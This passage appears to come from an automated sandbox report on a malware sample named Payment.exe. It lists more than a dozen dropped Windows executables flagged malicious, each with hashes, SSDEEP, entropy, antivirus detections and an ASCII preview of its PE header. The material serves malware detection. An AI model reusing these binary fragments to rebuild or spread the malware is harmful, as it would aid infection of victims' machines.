                                                                                                                                                                                                                                                                                                                                          SHA-256:68E63790DC9110D137F3522931E0AF7B60856F983BFFA72018A0548BE2F62BC9
                                                                                                                                                                                                                                                                                                                                          SHA-512:0E003428BD3726B63C116FD5BFC08A4D8A47C9378B37A92E913C9AC21DEDB3EDCBA8E697A446F90B3223CB8ECE6E1651480C5E52575712154F4A0C3838A768E6
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@...............................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1610752
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.193082602241774
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:MedP/DV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:HdP/pVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:BB8DD1E2CA47E0DACD8225AAD30A023A
                                                                                                                                                                                                                                                                                                                                          SHA1:DFDBD1355497C8F828D6267ACE5936DECC21A5A4
                                                                                                                                                                                                                                                                                                                                          SHA-256:983D36B9860E85D4F43DE83BB3601CF149F114C9071B9A23EEB0F95422CE1A00
                                                                                                                                                                                                                                                                                                                                          SHA-512:B65B35A7FA1DF5BC23AE4128C6F3E933F2F0785A6416C413BBDE460885AFABB4787D2A927B7B7E2FFC5E2DF36F635CE18BA3920B05EB60369FF1048E077060DA
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@.............................................................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1510912
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.0096291506349
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:BA5GV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:eEVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:7A5E2833D6B9DD9D8C1D4A649522827C
                                                                                                                                                                                                                                                                                                                                          SHA1:E1B6826BC602399EAED11ABE70BE5C7382DF4610
                                                                                                                                                                                                                                                                                                                                          SHA-256:DFA8604CCC45B7BC583E6CF62B9CFDAB28CB4BFB759CDCB08543A58B5104BA86
                                                                                                                                                                                                                                                                                                                                          SHA-512:7375C7ADEE3F7911F378EE6647E6AA0A012A9EF64BE8EBF4B455835A0320BE892B938DED61151D599C989442240BDC5B77832D482C2677A4BD095E748E18DC96
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@.......P.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1510912
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.009684347820805
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:q0luV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:tQVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:DA3D72230F341E4614D5822704077C13
                                                                                                                                                                                                                                                                                                                                          SHA1:D92E118709C72A8CC5452EBDD8ED2174574357DA
                                                                                                                                                                                                                                                                                                                                          SHA-256:853F6C4E221C63C1B5FABF9A3CCB9A4AC665420BEA1A7E9D3BFBC0B708C64E01
                                                                                                                                                                                                                                                                                                                                          SHA-512:634F70AC28D245B38A99A871B9CF5EB928A72363933172B947C35B6FF1B219587FCD4C274BEEA25C88A5EB7E64C78CBABC55AAD8AC4C4EEBFD670D3DC24461E3
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@...............................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1510912
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.009685039440904
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:HoluV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:IQVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:67038192D7B5393F2F89A2091A4EB1F0
                                                                                                                                                                                                                                                                                                                                          SHA1:EA0925A5649BF7BD929BE2BE459826C7853D635B
                                                                                                                                                                                                                                                                                                                                          SHA-256:46AD83FB3C6EA3BE5A8953224F42A72C0E2E8D30DE1F9B561C6C2B465FB7CB4B
                                                                                                                                                                                                                                                                                                                                          SHA-512:F56FF6BB1BA2291FD3CAFBCD8D07E88263C64F0751231B0BA7ECCEE2A42161D31AD8F94F9C338B1A940502F3BBC14934C92B16709B325FF61EFEC2974ED238DD
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@......0........................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1510912
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.0096617174381395
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:qhmOV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:yzVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:009464121A75DD09F7A1DE3C7E03E387
                                                                                                                                                                                                                                                                                                                                          SHA1:247D4B5B5A5D5120F816F7BF55B729074F410F4E
                                                                                                                                                                                                                                                                                                                                          SHA-256:BA6759ED1F7A5CD58276849EE2443FB56C90764951E6BC76DFD5AE5B8CEDC680
                                                                                                                                                                                                                                                                                                                                          SHA-512:C20B6FC487701D791E3EAB2B9E69B3E5D9D2532F8AC1A2FA02EC9BAA298472015D0DE4078E86316A3386D66DCE9B7C55FA2C0CFCD7956E5F2013149EB500C4A2
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@......|........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1510912
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.010412631456304
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:5EmCV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:m3Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:68AA2336E09D9C4335882B0766068D09
                                                                                                                                                                                                                                                                                                                                          SHA1:4A22C971318D7293F929A7D3C8ECFD21EDC4532E
                                                                                                                                                                                                                                                                                                                                          SHA-256:99DC9F4FCE4AAFFB58DEFFF7BFE856117BC4691523A8EBCA083AEF0A75416FF8
                                                                                                                                                                                                                                                                                                                                          SHA-512:0662ADDAD475E3EAD985873330BABCCAFC9F8D7FED382277FBF1AB79F1AB192F09BCF82E9B3E22912F264149938D8B9DC9A9F0431C71DFEF875974F9276DCBF7
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@......f ......................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1510912
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.009647028861104
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:HW5GV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:2MVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:5E03894606D4912F076F194BE0E8E301
                                                                                                                                                                                                                                                                                                                                          SHA1:A340FBE15422EDB70B0B4334C31C31F7E5EF36A0
                                                                                                                                                                                                                                                                                                                                          SHA-256:E4FFF247F253B27ECA0078BC37F70F1CD897E4A4D760E97823EC04AAE1675AF5
                                                                                                                                                                                                                                                                                                                                          SHA-512:12B405BDF723DA21FDBDE5832EB490F2BB153CA59C303475D8C30460BC427A1096553918D1A20C06609786507A01C043D40C26DC860C43967ECC73B802C317F6
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@..............................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1510912
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.009670902021384
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:G3/uV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:4GVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:DD7D8741673678EC6AFFB0DE9F13DF53
                                                                                                                                                                                                                                                                                                                                          SHA1:DE4A2EFFDAC7B1629D7E3A8092DF05B3C10DC31B
                                                                                                                                                                                                                                                                                                                                          SHA-256:241DBA8E6E67AF076C6CD62B98DF9C3E7FA4B2CDA897AB469253DA9A53846ED7
                                                                                                                                                                                                                                                                                                                                          SHA-512:4381C7816877764FAF8E718F27EDD9EC58DBAA51C5AFAE0A4F331E83C18828329550CBFDFF85C7383161A3031D94EA5D591878DF83673957B419C7434C2BA3F7
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@......q........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1510912
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.009591780607839
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:cTm+V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:ezVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:DF418A6D4A867AF04F66DA44C7203906
                                                                                                                                                                                                                                                                                                                                          SHA1:54CFF6256126D6D5E84339A34EC824A8D2C1DF41
                                                                                                                                                                                                                                                                                                                                          SHA-256:D607EE7401FABC8A89283CC5A73BE28FD361AE71810417BE67EB250635E24114
                                                                                                                                                                                                                                                                                                                                          SHA-512:28C5ECA759C9BD51830D929338183646B3BFC456B837B56F680F7748A0A676D7F865C39F062008899F1C0DF3A36DE700730EAA13A8E5CB34FD0688E6C7B07866
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@......m........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1510912
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.009633319817884
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:HUSmV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:0PVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:F8C8DF15087F6D87618F14D1DB0FAF01
                                                                                                                                                                                                                                                                                                                                          SHA1:FB4D460EC47C900B716AC2D746A86D5F4F895A0B
                                                                                                                                                                                                                                                                                                                                          SHA-256:B89E2C28B82C80729D31F68DDB832A40F360D50C767A7FF150096C3B88915C97
                                                                                                                                                                                                                                                                                                                                          SHA-512:03946FBEE0FB27CBCFD4AD6F1A9772A82988FFE36D2188834491F4C54483BA97DD5DC374A8979ACCF05FE6F56978ABF7653CD830FD98BBE6C71BB1B23F06E074
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@......Q'.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1510912
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.009690015818536
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:oj/uV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:WGVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:94F385BCFF17D74B5502DF7DA3691FE6
                                                                                                                                                                                                                                                                                                                                          SHA1:2EBE6A986F083D7AE57209DE93C2C2890F7B2A8B
                                                                                                                                                                                                                                                                                                                                          SHA-256:AE95C88B57D0DB60AA8BEB36192DC44BBAB32A311C1B08326FB646F7371188DB
                                                                                                                                                                                                                                                                                                                                          SHA-512:F4D3989708060E2435BFBCB151E32A2BCE3DF74657D19E011831CCF65CB17D7201A35C81583F72BB729410FE574FF03E809524B794F495940EB5567EAF96D8EA
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@...............................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1571328
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.104867928070065
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:2tAV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:2tsVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:864D8FD17F60D79D6D799899D4E8B851
                                                                                                                                                                                                                                                                                                                                          SHA1:8B219BAA610F27A447DD0C9719A2E6221195943E
                                                                                                                                                                                                                                                                                                                                          SHA-256:F6C9EA4B0FE3B84FDEE4B2BA105417D43BBC50C991C1625D40115A102B0B3B76
                                                                                                                                                                                                                                                                                                                                          SHA-512:A5E9AE4908A05C48FF839CD9D313C8AD279CEEE556531B0D0803A634271219A42ECC7A98A31A83515B819FBBBAB2D1A41CD006D3D71078F76F7E65BAEB3B3CB5
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@..........................0..................................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc.......@......................@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1511424
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.009489263948273
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:1MQyV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:S1Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:5982142A63F490E6A17B6A256FCDEC84
                                                                                                                                                                                                                                                                                                                                          SHA1:09D7463BFB62325A785BF17ECDDECDAEFA70FD9F
                                                                                                                                                                                                                                                                                                                                          SHA-256:5936EDC4E3EE16E6CF31BB25E6719CDBD18F0A51230A4E182688D26B95EFEC59
                                                                                                                                                                                                                                                                                                                                          SHA-512:A7A27F7B37A241CA59300C84AAD7C221932E6A4A5DF4823DF679A6CF0C80D15B4574E091E3BBB37F4D259E04B63AD16DFC7CEDB12AEBADA709474A15C30D69BF
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..........................@.......E.......................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc.......P.......0..............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1667584
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.295853719150252
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:Li7lp3roAgVg9N9JMlDlfjRiVuVsWt5MJMs:GlZroAQgFIDRRAubt5M
                                                                                                                                                                                                                                                                                                                                          MD5:6C1A2DD43D0F68CDB5E8AE7A81DC7EC5
                                                                                                                                                                                                                                                                                                                                          SHA1:E871FF32EDD2EBAA6A742FE7D7FD40AF189D76C2
                                                                                                                                                                                                                                                                                                                                          SHA-256:2C48484006FFEC7B9BF47C500000D4C7F76F2BD46ABF4DFD9D31E1AA580F5D62
                                                                                                                                                                                                                                                                                                                                          SHA-512:F461304E9E014961F40A71404D047A4603A4FA88F9036430F293FD0FCA63AF5238285D421600C0662A79CB6C41AC339544FC731A84F9B0F64E7BAEA87D71C693
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@.....................................................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc..............................@...........................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1637888
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.307785945903579
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:b5bfQhIV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:bNfQhkVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:24102019F92D5F0B45499420511B6451
                                                                                                                                                                                                                                                                                                                                          SHA1:4C430471EBFA7CDD82D3EFC50C30A9051E942E73
                                                                                                                                                                                                                                                                                                                                          SHA-256:B2BD55D49CD1F6CE6DF1C72DC83DB1769F48EBB856C0F8424116C19ED25F3BD1
                                                                                                                                                                                                                                                                                                                                          SHA-512:B4DC07733D55864D3F6918FA1A93A12DB48AE86EC5555E7FA526D759612508218E82323F2BCC44669E33FC7E20729C5E607EC6B4B3AAB02773BC2545754902C1
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@..........................@......~Z......................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc.......@......................@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1656320
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3332189432484265
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
